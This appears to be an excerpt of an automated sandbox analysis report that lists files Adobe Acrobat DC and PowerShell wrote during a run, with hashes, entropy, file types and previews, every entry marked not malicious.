                  Entropy (8bit):4.932552339462053
                  Encrypted:false
                  SSDEEP:
                  MD5:1B8F511BE0FCD6FB7524F55C9FB06E61
                  SHA1:01BFA769F459561D9748A7E1AD5862DF8216BA4E
                  SHA-256:41F52BA78E708F3EEBFB6720F9E13F5DDBE656BCA1E370DF90AA53223ABC6361
                  SHA-512:FCF398D9D4274A7FFE41DE433DF3137BC1D62D1933733BAD71ED0DC69F77209427585F8D84088242070835FF2697FBEA752437A7A8C0945CB5A924652DCDC8F5
                  Malicious:false
                  Reputation:unknown
                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145508750011","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:1B8F511BE0FCD6FB7524F55C9FB06E61
                  SHA1:01BFA769F459561D9748A7E1AD5862DF8216BA4E
                  SHA-256:41F52BA78E708F3EEBFB6720F9E13F5DDBE656BCA1E370DF90AA53223ABC6361
                  SHA-512:FCF398D9D4274A7FFE41DE433DF3137BC1D62D1933733BAD71ED0DC69F77209427585F8D84088242070835FF2697FBEA752437A7A8C0945CB5A924652DCDC8F5
                  Malicious:false
                  Reputation:unknown
                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145508750011","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                  Category:dropped
                  Size (bytes):86016
                  Entropy (8bit):4.444533372186583
                  Encrypted:false
                  SSDEEP:
                  MD5:96D8C33FBD8450CA8B567B72C8A5C448
                  SHA1:F05C65F1266ECA61198BF5D5605008D06609EA40
                  SHA-256:044AA8B5B7765AFD79DFDF003504C3FCA1DFC2E862C603C4CDAFC09B155DAF22
                  SHA-512:67E90825C336871A7DB2C41B0616D07F73F88575C58A74C98C7890114E8C35EC030795D193E3594848A5D7E438F2AF86607F1AD601DFC1B223F088D373526422
                  Malicious:false
                  Reputation:unknown
                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite Rollback Journal
                  Category:dropped
                  Size (bytes):8720
                  Entropy (8bit):3.7662928511252898
                  Encrypted:false
                  SSDEEP:
                  MD5:25C8D3A04A6806300051A628E4C425C0
                  SHA1:F1B63A505EB27171590DB9309C403D2D4F7F4AE8
                  SHA-256:46C584E6D9A6DB69FE8F6D969E93FB240CA0DF96E36C509BDFDCB67FD1A54F74
                  SHA-512:DA8DEF39BD6BBBA4155B27D0B3BF31EAD51CB2E0A9939DE9D7E14E245AA77AC4651CC7AF5773D03A3C8DC02BD7D059129FA312440BF37E149B7124283BCD89D2
                  Malicious:false
                  Reputation:unknown
                  Preview:.... .c......+.t...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:Certificate, Version=3
                  Category:dropped
                  Size (bytes):1391
                  Entropy (8bit):7.705940075877404
                  Encrypted:false
                  SSDEEP:
                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                  Malicious:false
                  Reputation:unknown
                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                  Category:dropped
                  Size (bytes):71954
                  Entropy (8bit):7.996617769952133
                  Encrypted:true
                  SSDEEP:
                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                  Malicious:false
                  Reputation:unknown
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):192
                  Entropy (8bit):2.7569015731729736
                  Encrypted:false
                  SSDEEP:
                  MD5:8C13F468C3ADF44021F01ACDBEAF0F8D
                  SHA1:2389A608CF132FE6B3E00C711B24DFAB020D20FD
                  SHA-256:D22A7A1D8F57D18FC9B425A147F8990B1EF2F405D14A80E2AEE75BDCD0F3497A
                  SHA-512:3DF81A4E16D44E026C968E58EB5C9F7B9CD1221B17E77BAE1E73B5FDB2D4D6CA2E96382587F542039DD6F6A2B4818F046E66253601FC49B81A9C4E895A776E43
                  Malicious:false
                  Reputation:unknown
                  Preview:p...... ............E..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:modified
                  Size (bytes):328
                  Entropy (8bit):3.244101792565376
                  Encrypted:false
                  SSDEEP:
                  MD5:006E2F3E4A63D971CDADBAF4F2CA3DE3
                  SHA1:EFDE7CD8600E238BDA9D3C8EEDA0F880B9E824A9
                  SHA-256:F6D832ED06CB8CE18163E63A189CABB9C1B72FD2E7AB18A49E081A0E932AC7C4
                  SHA-512:E98AA72426DE57D69EBD873499AD616F6EC6964DE36DB823A835631334A731D21F79EFA089C004188107A263D378443706DC904CC0EFCD9277877B6601403D9E
                  Malicious:false
                  Reputation:unknown
                  Preview:p...... ........r...E..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                  Malicious:false
                  Reputation:unknown
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6404

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):1233
                  Entropy (8bit):5.233980037532449
                  Encrypted:false
                  SSDEEP:
                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                  Malicious:false
                  Reputation:unknown
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                  Malicious:false
                  Reputation:unknown
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:B60EE534029885BD6DECA42D1263BDC0
                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                  Malicious:false
                  Reputation:unknown
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6404

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):10880
                  Entropy (8bit):5.214360287289079
                  Encrypted:false
                  SSDEEP:
                  MD5:B60EE534029885BD6DECA42D1263BDC0
                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                  Malicious:false
                  Reputation:unknown
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):0.8112781244591328
                  Encrypted:false
                  SSDEEP:
                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                  Malicious:false
                  Reputation:unknown
                  Preview:....

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):1969
                  Entropy (8bit):5.049406294768241
                  Encrypted:false
                  SSDEEP:
                  MD5:A5487E2932380B89D7B913BA0CADE93E
                  SHA1:2674B0FD23C8333D76A6CBD95EF705AACDBA8ED7
                  SHA-256:F909941BE05AC12E5E1288B69306EF0A7C4851ED649A5A311C1B5B8B8F92F346
                  SHA-512:972A0E8A952ACA4F7F455EEB85D4A9EDEF7DD4B7A4A4B1E9E2815B14B48D0A8286123DEB0136B667C3EFCC43FDB957203BF6D1DA2A433B284EE61DB105D65A1E
                  Malicious:false
                  Reputation:unknown
                  Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733240454000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"a7d5f1623758b44a6bb1af710a205b8e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696586967000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"b0f98dc45482391504041ce5d4455f67","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696586967000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"9eb8200575456615765dda2e131b71fc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696585522000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"2041266456e181a98e8e0a84e20ab5ca","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696585522000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"d3efd339915bc97d78dbef1d69dfc3c6","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1696585522000},{"id":"Edit_InApp_Aug2020","info":{"dg":"d

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
                  Category:dropped
                  Size (bytes):12288
                  Entropy (8bit):1.355756860512422
                  Encrypted:false
                  SSDEEP:
                  MD5:5487AADF3842AEDEB9D78F56ECB5C3B9
                  SHA1:A45224A74A6F22B5A56063759614FFB37074D353
                  SHA-256:2AC44784BC9CDD70A839762627ABCF04C989C3EFE172710A5EA038BAB4A41D1D
                  SHA-512:200B4306632A6B3E6131DC142361A098FA0BCB14DA806046116AFB8A3A7D578783AA88ED3CB7947479337CA133E849AC28E926B7A89E3EC5C900870AC7E4C94C
                  Malicious:false
                  Reputation:unknown
                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite Rollback Journal
                  Category:dropped
                  Size (bytes):8720
                  Entropy (8bit):1.8304493461245706
                  Encrypted:false
                  SSDEEP:
                  MD5:EC334698857405FD00784245F3E65D64
                  SHA1:982BC0C15BFCDA1852449CBDD0BF10E36183047D
                  SHA-256:826E6B23D8C28AC472660EBEA9DAB04CB7902F1DF72011D25C5828338053B818
                  SHA-512:E3DCF7D76326110B36DA73BAF1B22BE88FE7D8B4FC4162924B9B5D672BF325D91C59F3ACBCFFAA46CEC7CF6CC3A0216268C51704DC75323FCC10E3018B7AF501
                  Malicious:false
                  Reputation:unknown
                  Preview:.... .c..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66726
                  Entropy (8bit):5.392739213842091
                  Encrypted:false
                  SSDEEP:
                  MD5:87EE0F0505515166602CCFF816B029BB
                  SHA1:1CEF3EAFD8F4904539A528F587D969E19012AE4A
                  SHA-256:C70A2B9077C8C8C7EF2849BF9E5DB67D7CFE29FFB6BBE19F3ECEEADF4549FD76
                  SHA-512:461FDFDAC0A4C55612EE042D5FABB182B7BD51D67A72D7196CECB5E25AA87A5ACEECE9D0F16ACDC96DCDA0B32BA185B5C84C8B9264F7757EA8E4BB9298FD564D
                  Malicious:false
                  Reputation:unknown
                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9434
                  Entropy (8bit):4.928515784730612
                  Encrypted:false
                  SSDEEP:
                  MD5:D3594118838EF8580975DDA877E44DEB
                  SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                  SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                  SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                  Malicious:false
                  Reputation:unknown
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                  C:\Users\user\AppData\Local\Temp\MSI8223f.LOG

                  Download File
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):246
                  Entropy (8bit):3.5258803161342094
                  Encrypted:false
                  SSDEEP:
                  MD5:6356B377A93E18F5C01CB9C9AC6CAF00
                  SHA1:A198255DE9FA6E3F38C1B2BD98EC65494FE59959
                  SHA-256:84E025086B130A6F9D6FDDD45C069FA9D1BA9801504D220827A3952B42F283C5
                  SHA-512:DA53467D3B5C95DA1BEF92939C6F75CFF6D4B32CAE84DE0148AD47C5BF288994332B13360D235C90FDB96EED93A04FA238F0C5427F944C81B1CB0D8C0379A5B1
                  Malicious:false
                  Reputation:unknown
